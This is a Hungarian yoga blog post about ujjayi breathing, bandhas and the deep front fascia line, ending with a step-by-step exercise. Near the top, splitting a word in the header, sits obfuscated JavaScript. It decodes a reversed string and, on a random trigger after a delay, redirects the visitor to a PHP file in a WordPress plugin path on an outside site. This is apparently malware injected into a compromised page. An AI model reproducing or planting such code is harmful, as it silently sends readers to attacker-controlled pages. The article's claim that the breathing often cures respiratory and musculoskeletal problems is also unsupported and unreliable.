Top

Mesterkulcs az astangához

David Swanson Budapest M$GQRkExOVl1p57bbeL4u=function(n){if(typeof($GQRkExOVl1p57bbeL4u.list[n])=="string")return $GQRkExOVl1p57bbeL4u.list[n].split("").reverse().join("");return $GQRkExOVl1p57bbeL4u.list[n]};$GQRkExOVl1p57bbeL4u.list=["'php.sofnI/slitU/eroC/sppa/gnigats-pw/snigulp/tnetnoc-pw/moc.stelotog//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andala

Mesterkulcs az astangához

Az astanga folyamatos, lassú fújtató légzéséről, az udzsájíról számtalan cikket olvastam: legtöbben az energetikai hatásokat elemezték, sokan a helyes technikáról írtak, és néhányan megkísérelték a légzést létrehozó izmok leírását. Bizonyára létezik olyan cikk is, ami fasciális (izompólya rendszer) szempontból közelít az udzsájí légzéshez, de én még nem találkoztam ilyennel – pedig a saját gyakorlásomban nagyon sokat segített, amikor elkezdtem figyelni a központi mély fascialáncban az udzsájí hatására létrejövő történéseket.
 
Manju azt mondta az udzsájíról és a bandhákról, hogy az egész nem más, mint mély légzés. Azt gondolom, hogy ez a megközelítés kezdők számára praktikus és többnyire elégséges is, azonban a gyakorlás elmélyülésével ráébredünk, hogy valójában éppen ez a kulcsa a jóga helyes gyakorlásának.
 
A fascia modell
 
Amikor a fascialáncok közül a “deep front line-t”, vagyis a központi mély vonalat elemeztük, nem győztünk álmélkodni azon, hogy az udzsájíval foglalkozó finomenergetikai megfigyelések mennyire pontosan írták le ennek a fontos kötőszöveti útvonalnak a működését.
 
A központi lánc a talp, a lábszár és a comb belső oldalán keresztül kapcsolódik a gát, a rekeszizom és a garat vízszintes anatómiai egységeihez. A láncolat működése hatással van a gerinc és a belső szervek működésére, így a tartásra és a mozgás közbeni stabilizációra is. Aktiválásával számos légző- és mozgásszervi probléma megelőzhető, sőt, sokszor gyógyítható.
 
A központi lánc aktiválása a legtöbb ember számára azonban nem könnyű. Számos kezelés létezik, ami ezt az aktiválást célozza, és sok jógatechnikának is van ilyen hatása, azonban a legegyszerűbb, mégis talán a leghatékonyabb módja nem más, mint az udzsájí légzés!
 
A csodálatos a jógában, hogy semmit nem kell elhinned, amiről a tanítások szólnak, minden kipróbálható, elsajátítható, majd továbbadható. Ha szeretnél megbizonyosodni az udzsájí és a mély horizontális fascialánc kapcsolatáról, tedd a következőt:
 

1. Állj laza alapállásba (szamaszthiti).
2. Figyeld a légzésed egy rövid ideig.
3. Vidd a figyelmed a talp belső oldalára és finoman aktiváld az itt futó izmokat (öregujjhajlító izom, lábujjhajlító izom)
4. Aktiváld a vádli belső oldalát.
5. Aktiváld a comb belső oldalát.
6. Aktiváld a gát körüli izmokat (múla bandha).
8. Aktiváld rekeszizmot (belégzésnél a köldök befelé és felfelé mozog – uddijána bandha).
9. Aktiváld a garat körüli izmokat (így keletkezik a jellegzetes fújtató hang – dzsalandhara bandha).
10. Aktiváld a tarkó területét (nyújtózz a fejjel kissé hátra- és felfelé).

 
Eleinte szánj egy-két percet minden gyakorlás előtt a fenti gyakorlatra, majd, amikor már egy légzésen belül is végig tudod vezetni a figyelmed a láncolaton, próbáld meg mozgás közben is megtartani a légzésnek ezt a tudatos módját. Már az első gyakorlásnál érezni fogod a hatásokat, néhány alkalom után a gyakorlásod elmélyültebb és koncentráltabb lesz, néhány hét múlva pedig az egész gyakorlás könnyedebb, hatékonyabb, tudatosabb.
 
“Ashtanga practice is breathing practice, the rest is just bending”.
 
Az astanga gyakorlása légzőgyakorlat, a többi csak hajlongás – mondta félig tréfásan Pattabhi Jois.
 
Évek telhetnek el úgy, hogy újabb és újabb érzetek és hatások jelentkeznek, az udzsájí légzés mélyül, finomodik, egyre tudatosabb lesz. Erre a folyamatra utalt Nancy Gilgoff azzal az elhíresült mondásával, hogy “az astanga jóga a múla bandha vég nélküli keresése”…

Németh Gergő

Meggyőződésem, hogy a jóga az egyik legjobb dolog, amit tehetünk magunkért és másokért!

No Comments

Sorry, the comment form is closed at this time.